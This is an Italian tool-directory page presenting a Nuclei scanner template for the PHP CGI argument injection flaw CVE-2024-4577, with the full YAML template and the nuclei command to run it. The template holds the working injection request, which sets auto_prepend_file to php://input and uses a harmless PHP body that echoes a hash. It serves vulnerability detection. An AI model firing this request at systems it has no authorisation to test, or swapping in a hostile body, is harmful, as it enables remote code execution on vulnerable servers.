Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-4577-Nuclei-Template — Modello Nuclei per il rilevamento della vulnerabilità di iniezione degli argomenti CGI in PHP CVE-2024-4577, che consente test automatizzati di RCE tramite richieste HTTP appositamente costruite e corrispondenza delle risposte. | Kitploit
Strumenti/GitHubGitHub/huseyinstif/cve-2024-4577-nuclei-template
Scanner di VulnerabilitàAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubhuseyinstif/cve-2024-4577-nuclei-template

CVE-2024-4577-Nuclei-Template

Modello Nuclei per il rilevamento della vulnerabilità di iniezione degli argomenti CGI in PHP CVE-2024-4577, che consente test automatizzati di RCE tramite richieste HTTP appositamente costruite e corrispondenza delle risposte.

Vedi Repository
22242 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-4577 Template Nuclei

Questo repository contiene un template Nuclei per rilevare la vulnerabilità di iniezione degli argomenti PHP CGI identificata come CVE-2024-4577.

Dettagli del Template

root@kitploit:~
id: CVE-2024-4577

info:
  name: CVE-2024-4577 PHP CGI Argument Injection
  author: Hüseyin TINTAŞ
  severity: critical
  description: >
    CVE-2024-4577 PHP CGI Argument Injection Vulnerability.
    This template checks if the response contains "CVE_2024_4577_TEST" indicating a successful injection.
  tags: cve,cve2024,php,cgi,rce,cve2024-4577

http:
  - method: POST
    path:
      - "{{BaseURL}}/cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      - "{{BaseURL}}/php-cgi/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      - "{{BaseURL}}/cgi-bin/php.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      - "{{BaseURL}}/php-cgi/php.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      - "{{BaseURL}}/index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      - "{{BaseURL}}/index.test?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      
    headers:
      User-Agent: "curl/8.3.0"
      Accept: "*/*"
      Content-Type: "application/x-www-form-urlencoded"
      Connection: "keep-alive"
    body: |
      <?php echo md5("CVE_2024_4577_TEST"); ?>
    matchers:
      - type: word
        part: body
        words:
          - "83946a388fdf6cd2707eed8550575a76"

Utilizzo

Per usare questo template con Nuclei, salva il contenuto del template in un file chiamato CVE-2024-4577.yaml ed esegui il seguente comando:

root@kitploit:~
nuclei -t CVE-2024-4577.yaml -u <target-url>

Sostituisci <target-url> con l'URL del target che vuoi scansionare.

Contatti

Per qualsiasi richiesta o ulteriore informazione, puoi contattarmi tramite:

  • LinkedIn
  • Twitter
Scarica lo strumento